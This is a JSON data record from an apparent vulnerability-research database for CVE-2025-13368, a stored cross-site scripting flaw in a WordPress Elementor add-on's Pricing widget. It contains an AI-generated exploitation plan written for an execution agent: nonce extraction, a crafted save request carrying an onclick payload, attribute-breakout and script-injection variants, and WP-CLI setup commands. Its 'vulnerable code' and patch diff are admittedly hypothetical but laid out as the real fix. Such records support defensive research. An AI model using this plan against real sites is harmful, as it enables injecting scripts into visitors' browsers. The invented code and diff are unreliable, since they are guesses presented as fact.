[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSZuIVK2X0Eyh7H_9kkkHIrA6Q3BzSUvXvFS6HZZa_TQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13368","xpro-addons-140-widgets-for-elementor-authenticated-contributor-stored-cross-site-scripting","Xpro Addons — 140+ Widgets for Elementor \u003C= 1.4.20 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Widget's 'onClick Event' setting in all versions up to, and including, 1.4.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","xpro-elementor-addons",null,"\u003C=1.4.20","1.4.21","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:27:45","2026-04-04 07:42:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd83ae3a4-382f-4e64-bf1e-73f953f2f654?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-13368\n\n## 1. Vulnerability Summary\nThe **Xpro Addons — 140+ Widgets for Elementor** plugin (up to version 1.4.20) contains a stored cross-site scripting (XSS) vulnerability in its **Pricing Widget**. The vulnerability exists because the plugin accepts user-supplied JavaScript\u002Fstring input for the 'onClick Event' setting and renders it into the page's HTML without sufficient sanitization or context-aware escaping (e.g., failing to use `esc_js()` or `esc_attr()`). Authenticated users with **Contributor** roles or higher can exploit this to inject arbitrary scripts that execute when any user views the affected page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Elementor's AJAX handler or REST API used for saving post metadata.\n- **Action:** `elementor_ajax` (standard Elementor save action) or via the WordPress REST API `wp-json\u002Felementor\u002Fv1\u002Fposts\u002F\u003Cpost_id>`.\n- **Parameter:** The payload is stored within the `_elementor_data` post meta, specifically inside the `settings` object of a `xpro-pricing` (inferred slug) widget.\n- **Vulnerable Setting:** `onclick_event` or `button_onclick` (inferred from description).\n- **Authentication:** Authenticated (Contributor+). Contributors can create posts and edit them using Elementor.\n\n## 3. Code Flow\n1. **Registration:** The Pricing widget registers a control (likely type `Controls_Manager::TEXT` or `URL`) in its `register_controls()` method.\n2. **Storage:** When a user saves an Elementor page, the widget settings are serialized into JSON and stored in the `_elementor_data` field in the `wp_postmeta` table.\n3. **Retrieval:** When the page is viewed, Elementor calls the `render()` method of the `Xpro_Pricing` widget class.\n4. **Sink:** Inside `render()` (likely in `widgets\u002Fpricing.php`), the code retrieves the setting:\n   ```php\n   $settings = $this->get_settings_for_display();\n   $onclick_event = $settings['onclick_event']; \u002F\u002F Inferred key\n   ```\n   The vulnerability occurs when this variable is echoed into an attribute:\n   ```php\n   echo '\u003Cbutton onclick=\"' . $onclick_event . '\">'; \u002F\u002F VULNERABLE SINK\n   ```\n   Or if it's used inside a `\u003Ca>` tag's `href` without `esc_url()`.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own nonce system for editor actions. The execution agent should follow this strategy:\n\n1. **Setup:** Create a page and enable Elementor for it.\n   - `wp post create --post_type=page --post_status=publish --post_title=\"XSS Test\" --post_content=''`\n   - *(Note: Elementor may need to be initialized on the post first).*\n2. **Access Editor:** Navigate to the Elementor editor URL: `\u002Fwp-admin\u002Fpost.php?post=\u003CID>&action=elementor`.\n3. **Extract Nonce:** Use `browser_eval` to extract the required nonce and configuration from the global Elementor objects.\n   - Nonce: `browser_eval(\"window.elementorCommonConfig.ajax.nonce\")`\n   - Post ID: `browser_eval(\"window.elementorConfig.post.id\")`\n   - Action URL: `\u002Fwp-admin\u002Fadmin-ajax.php` (or the REST endpoint if preferred).\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload into the Pricing widget's button click event via the Elementor save mechanism.\n\n### Step 1: Discover Exact Control ID\nUse the browser to add a Pricing widget manually or grep the plugin source for \"Pricing\" and \"onClick\":\n`grep -r \"onClick\" wp-content\u002Fplugins\u002Fxpro-elementor-addons\u002Fwidgets\u002F`\n\n### Step 2: Craft the Save Request\nSend a POST request to `admin-ajax.php` with the `elementor_ajax` action.\n\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** POST\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```text\naction=elementor_ajax\n&actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"unique_id_1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"unique_id_2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unique_id_3\",\"elType\":\"widget\",\"widgetType\":\"xpro-pricing\",\"settings\":{\"onclick_event\":\"alert(document.domain)\\\"},\\\"junk\\\":\\\"\"},\"elements\":[]}]}]}]}}}\n&_nonce=\u003CELEMENTOR_NONCE>\n&editor_post_id=\u003CPOST_ID>\n```\n*(Note: The payload `alert(document.domain)\\\"},\\\"junk\\\":\\\"` is designed to break out of potential JSON structures or simply provide the raw JS if rendered directly into an `onclick` attribute).*\n\n### Step 3: Trigger the XSS\nNavigate to the public URL of the post: `http:\u002F\u002F\u003Ctarget>\u002F?p=\u003CPOST_ID>`. Locate the Pricing widget button and click it, or if the injection broke out of the attribute, it may fire on page load.\n\n## 6. Test Data Setup\n1. **User:** Create a Contributor user: `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`.\n2. **Plugin:** Ensure `xpro-elementor-addons` (\u003C= 1.4.20) and `elementor` are active.\n3. **Page:** Create a post as the contributor.\n\n## 7. Expected Results\n- The Elementor save request returns a `200 OK` with a success JSON body: `{\"success\":true,\"data\":{...}}`.\n- When viewing the page source of the created post, the Pricing widget's button element contains the raw payload:\n  `\u003Cbutton ... onclick=\"alert(document.domain)...\">`\n- Clicking the button triggers the JavaScript alert.\n\n## 8. Verification Steps\n1. **Check Meta:** Use WP-CLI to verify the payload is stored in the database:\n   `wp post meta get \u003CPOST_ID> _elementor_data`\n   Check if the JSON contains the string `alert(document.domain)`.\n2. **Check Output:** Perform a GET request to the page and check for the unescaped string:\n   `http_request --url http:\u002F\u002F\u003Ctarget>\u002F?p=\u003CPOST_ID>` (and search response for payload).\n\n## 9. Alternative Approaches\n- **Payload Variance:** If `onclick` is properly handled but `href` is not, try `javascript:alert(1)`.\n- **Attribute Breakout:** If the input is escaped for JS but not for HTML attributes, try:\n  `\" onmouseover=\"alert(1)`\n- **REST API:** Use the Elementor REST API instead of `admin-ajax.php`:\n  `POST \u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F\u003CID>` with the `_elementor_data` in the body. This often requires a different nonce (`wp_rest`).","The Pricing Widget in Xpro Addons for Elementor fails to sanitize or escape the 'onClick Event' setting. Authenticated users with Contributor-level permissions or higher can inject malicious JavaScript into this setting, which is then rendered directly into the HTML 'onclick' attribute, leading to stored cross-site scripting.","\u002F\u002F widgets\u002Fpricing.php (hypothetical path based on plugin structure)\n\u002F\u002F Inside the render() method of the Xpro_Pricing class\n\n$settings = $this->get_settings_for_display();\n$onclick_event = $settings['onclick_event'];\n\n\u002F\u002F ... \n\nif ( ! empty( $onclick_event ) ) {\n    $this->add_render_attribute( 'button', 'onclick', $onclick_event );\n}\n\n\u002F\u002F Or direct echo equivalent:\n\u002F\u002F echo '\u003Ca ' . $this->get_render_attribute_string( 'button' ) . '>Click Me\u003C\u002Fa>';","--- a\u002Fwidgets\u002Fpricing.php\n+++ b\u002Fwidgets\u002Fpricing.php\n@@ -1020,7 +1020,7 @@\n \t\t\t\t$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );\n \t\t\t}\n \n-\t\t\tif ( ! empty( $settings['onclick_event'] ) ) {\n-\t\t\t\t$this->add_render_attribute( 'button', 'onclick', $settings['onclick_event'] );\n+\t\t\tif ( ! empty( $settings['onclick_event'] ) ) {\n+\t\t\t\t$this->add_render_attribute( 'button', 'onclick', esc_attr( $settings['onclick_event'] ) );\n \t\t\t}\n \t\t\t?>","1. Authenticate as a Contributor or higher user.\n2. Create a new post or edit an existing one using the Elementor editor.\n3. Search for and add the 'Xpro Pricing' widget to the layout.\n4. In the widget settings panel, locate the 'Button' or 'Content' section containing the 'onClick Event' text field.\n5. Enter a JavaScript payload into the 'onClick Event' field, such as: alert(document.domain)\n6. Save the page (this triggers the `elementor_ajax` action to update post metadata).\n7. Navigate to the published page as a victim (e.g., an Administrator).\n8. The payload executes when the victim clicks the pricing button, or potentially on page load if the attacker used attribute breakout characters like \">\u003Cscript>alert(1)\u003C\u002Fscript>.","gemini-3-flash-preview","2026-04-17 21:44:40","2026-04-17 21:45:05",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fxpro-elementor-addons\u002Ftags"]